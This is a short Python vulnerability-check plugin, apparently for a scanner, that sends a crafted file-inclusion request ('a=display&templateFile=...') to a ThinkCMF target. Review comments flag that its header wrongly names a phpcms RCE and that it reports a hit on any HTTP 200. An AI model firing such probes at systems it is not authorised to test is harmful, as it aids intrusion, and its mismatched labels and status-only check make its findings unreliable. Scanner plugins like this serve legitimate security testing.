# Author:w8ay
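# Name:phpcms 2008 rce
# NOTE(review): the finding returned by poc() is named "thinkcmf_lfi" and tagged "lfi";
# this header looks carried over from another plugin. Confirm which product and issue
# class the check targets so that findings are triaged correctly.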
'''
reference: https://xz.aliyun.com/t/6626
description: Arbitrary content inclusion reachable by invoking the display method through the `a` parameter.
'''
import HackRequests

def poc(arg, **kwargs):
    """Probe ``arg`` with the display/templateFile request and report a hit.

    Args:
        arg: Base URL of the target; the probe path is appended to it as-is.
        **kwargs: Accepted but not used in this function.

    Returns:
        A dict describing the finding when the probe is answered with
        HTTP 200; otherwise None.
    """
    probe_path = r'''/?a=display&templateFile=./data/install.lock'''
    target_url = arg + probe_path
    response = HackRequests.http(target_url)

    # NOTE(review): the decision rests on the status code alone. An earlier
    # body-marker comparison is disabled in the original, so any server that
    # answers 200 to unknown query strings is reported as affected. Treat a
    # hit as a lead to verify by hand, not as a confirmed finding.
    if response.status_code != 200:
        return None

    return {
        "name": "thinkcmf_lfi",  # plugin name
        "content": "通过构造a参数的display方法，实现任意内容包含漏洞.",
        "url": target_url,  # URL at which the issue was observed
        "log": response.log,
        "tag": "lfi",  # vulnerability tag
    }

# Running this file directly does nothing; poc() is presumably called by the
# scanner that loads this plugin — confirm against the host framework.
if __name__ == "__main__":
    pass